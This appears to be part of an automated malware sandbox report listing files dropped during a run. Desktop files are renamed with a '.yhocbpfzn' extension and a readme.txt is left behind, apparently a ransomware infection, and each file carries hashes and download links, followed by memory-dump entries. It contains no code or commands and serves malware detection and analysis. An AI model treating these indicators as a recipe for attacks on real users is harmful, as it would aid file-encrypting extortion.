C:\Users\Admin\Desktop\ClearComplete.ppsx.yhocbpfzn

MD5
e7f9c76719aae9fd69af984a1098db29

SHA1
f345b505b2f156cfa3cb0b2c606e57b95900727c

SHA256
936854b3cfa51340aaaffd99f59dca36aa258a3fd57b94b08be35a67b4b398b7

SHA512
0cb37042cfdc93869de937a1dcb430dde42997214c599f2e3ccfd4c37cc49004a11bbaec5210615ba7164d0e2b57dc9a47b12b635832a05f94bdaedd91c0bbfa

Download Submit
C:\Users\Admin\Desktop\DenyConnect.xlt.yhocbpfzn

MD5
2f7a918dc45df2371dc1d7c35836431a

SHA1
ecfce12f277714e243e0f67b666f05b731bd7fe2

SHA256
f5e67b873c4c1732a5ea919efa5a883dfe7900e571638c5648c24cc111ddb209

SHA512
8f62ee9b00764719091f4ea9c71254bcba8097135195aed5f641feea3d0e6c7c05f33eaec826db768c24926b0a11bda261050c7e9c4c5427b965c1ae4bfa2e1d

Download Submit
C:\Users\Admin\Desktop\EditUnlock.xltx.yhocbpfzn

MD5
6ec93d4d56be0a592c4fab5d4b71f2ef

SHA1
b9ddb0913b2a0d149bc2ec46726bcf09ed2f6542

SHA256
51589f36790c29788a11b21245a62f558ac973ddf35ecd5cb3bc3d9fcf9253d6

SHA512
2ba852194dd0a371f260932a219b0b10a0c498de8d9554280f83d297192505ae82bbaf41b81f2ed3efd54447bde87cc0e6f61ad877e7ad18b3aab05c7fd4bfbd

Download Submit
C:\Users\Admin\Desktop\JoinRemove.crw.yhocbpfzn

MD5
20f0d1bb4e2da89dfe7dffde3b922c00

SHA1
34d9607c071ecf3f7dfca573683ba972d2e816e9

SHA256
9c885b0968996fd1f8366b008582dd728421248d420123a5b008902cf4bed184

SHA512
f03b4c93862a89e7a2c654ccbdd80fba22c643103f0b717de605b11bbc97c9e9016acb7a72df91f13bdafe2ec010d15b1471b1e0473b60b4635fb3a726e4df2d

Download Submit
C:\Users\Admin\Desktop\MergeSet.dib.yhocbpfzn

MD5
8d7a31e125fc66b40160578e1141a37f

SHA1
4cc108af466589fd49477d1858f532c92520c008

SHA256
1b575274d451e64ef376bb344ef65a958f952802feaad78de8dbbf095c6f4a41

SHA512
18793a4fbee2ca177f0f0dadbf8a40d8713d3e7a9f855bb1009f54ac7d1fbf3c291316e489781d38888eb6f6be9000725ee7b43784321dd6d037cd62e653a059

Download Submit
C:\Users\Admin\Desktop\ReadDebug.tif.yhocbpfzn

MD5
b2f0e5062d13d9b36e85ad44e2936db3

SHA1
3a9013ccde54679dbdf8f7f240791bb0c33beeaa

SHA256
74df725e0f8e85cc42ec6afa7c350a1182cdca05f85557ec6040a0cbc9ff84f3

SHA512
f0ff28a7262e0092ea20fb0cefa8a7d05c2834fdf654acb2f49c4f46d93a834daf73c60c368fa65773e06cf15333f082e9b0b3a0a8c346315a2fcee297f88fb4

Download Submit
C:\Users\Admin\Desktop\ResizeProtect.gif.yhocbpfzn

MD5
972d986cd2278cacb6cf47b926947b61

SHA1
52e6f0b906f138927530d4e635b68343c690eb41

SHA256
acf9924b006bfc8f69c88bc923f218b0aedf0dc78b3a6235da71f894e442413e

SHA512
1218172163cd83169791b971e240d17da0b72d195af451c14ad2609ba58532c1855446967e96494f170b2665b3385a1fcbd0348956da90ac0d86b8b5a5e971e4

Download Submit
C:\Users\Admin\Desktop\ResumeSkip.jpeg.yhocbpfzn

MD5
3541be879c3c8432bd708b2dfffcb78d

SHA1
0bf6a41dc66e4437286a4279aaf0bb8c4a79d06b

SHA256
2b0f5d9abb70baf10df5cd68f5c27736bd9f797019a89b8303dee1a88c7705cf

SHA512
2b4f8bf5753b00c4252e6127ece3920d20315194bf36daad0080eee39028363439ad438fb9c98dac69ac21019ea10a8996f9191ad0fa0770b61e4ac61fc9655f

Download Submit
C:\Users\Admin\Desktop\SwitchConvertFrom.dotm.yhocbpfzn

MD5
f80af89376751a8536a35cd1a68aad79

SHA1
c6a6527d4bf24983d3832683daa3ca357b2e5c72

SHA256
eb778b57d6ff687f6c960c808c89d4e1f46d1f0adc40ecdbd8082aee13ea1403

SHA512
3ee9e2328be7cbe0e4944d4158dec2216869a4a97882ec56bea1c439a77e5be3c9f15824483e357ab19d2a86bfda83d5f7a1fa87a51d829850006e465871711a

Download Submit
C:\Users\Admin\Desktop\UpdateRedo.xps.yhocbpfzn

MD5
8ce9b87c227451172d5953273f2ccd6c

SHA1
69e47461ff22df7a602503e86613f374196d15a9

SHA256
ba0d43aa4083694ddf98eed118670185742a9c3f169d62a8e0c235f218342911

SHA512
efa06f09b0a98a860f29e2850bbf3289dfbc2cc38a8177828a9fd5218b26b9c73a6a74ba09e19265aca24ac14e03bfd6dc5e9fc7027020a28209bcb7f5553bd7

Download Submit
C:\Users\Admin\Desktop\readme.txt婍

MD5
496505489d40ebf584e8c0cfbd9af840

SHA1
cd7f075d4c04654688836d507aa081fcf10d83b5

SHA256
62bb6486e506e1f4430ae9134239cbc4f0ad037d9ebd6bb4d1af17332ea06802

SHA512
16103f8d8927c3c9679919318b959d274d95645e2e6c6ea12e27ed6aa092a2e75ae4269a4d7764d8a108b2c1413b03b5eb86f55ba8788bf1d632089d1b25fd5b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/204-101-0x0000000000000000-mapping.dmp

Download
memory/216-106-0x0000000000000000-mapping.dmp

Download
memory/220-113-0x0000000000000000-mapping.dmp

Download
memory/432-79-0x0000000000000000-mapping.dmp

Download
memory/568-100-0x0000000000000000-mapping.dmp

Download
memory/700-98-0x0000000000000000-mapping.dmp

Download
memory/736-77-0x0000000000000000-mapping.dmp

Download
memory/752-114-0x0000000000000000-mapping.dmp

Download
memory/752-99-0x0000000000000000-mapping.dmp

Download
memory/900-105-0x0000000000000000-mapping.dmp

Download
memory/1032-72-0x0000000001B90000-0x0000000001B91000-memory.dmp

Filesize
4KB

Download
memory/1032-62-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/1032-63-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/1032-74-0x0000000003F30000-0x0000000003F31000-memory.dmp

Filesize
4KB

Download
memory/1032-61-0x0000000001DC0000-0x0000000002374000-memory.dmp

Filesize
5.7MB

Download
memory/1032-67-0x00000000002E0000-0x00000000002E1000-memory.dmp

Filesize
4KB

Download
memory/1032-71-0x0000000001B80000-0x0000000001B81000-memory.dmp

Filesize
4KB

Download
memory/1032-69-0x00000000005C0000-0x00000000005C1000-memory.dmp

Filesize
4KB

Download
memory/1032-70-0x00000000005D0000-0x00000000005D1000-memory.dmp

Filesize
4KB

Download
memory/1032-68-0x00000000002F0000-0x00000000002F1000-memory.dmp

Filesize
4KB

Download
memory/1032-64-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download
memory/1032-66-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1032-80-0x0000000003F50000-0x0000000003F51000-memory.dmp

Filesize
4KB

Download
memory/1032-65-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1064-96-0x0000000000000000-mapping.dmp

Download
memory/1100-76-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

Filesize
8KB

Download
memory/1100-75-0x0000000000000000-mapping.dmp

Download
memory/1108-73-0x0000000000410000-0x0000000000415000-memory.dmp

Filesize
20KB

Download
memory/1148-102-0x0000000000000000-mapping.dmp

Download
memory/1148-110-0x0000000000000000-mapping.dmp

Download
memory/1204-60-0x00000000029E0000-0x00000000029F0000-memory.dmp

Filesize
64KB

Download
memory/1264-83-0x0000000000000000-mapping.dmp

Download
memory/1344-117-0x0000000000000000-mapping.dmp

Download
memory/1384-112-0x0000000000000000-mapping.dmp

Download
memory/1556-84-0x0000000000000000-mapping.dmp

Download
memory/1580-108-0x0000000000000000-mapping.dmp

Download
memory/1696-82-0x0000000000000000-mapping.dmp

Download
memory/1740-78-0x0000000000000000-mapping.dmp

Download
memory/1804-111-0x0000000000000000-mapping.dmp

Download
memory/1896-104-0x0000000000000000-mapping.dmp

Download
memory/1976-107-0x0000000000000000-mapping.dmp

Download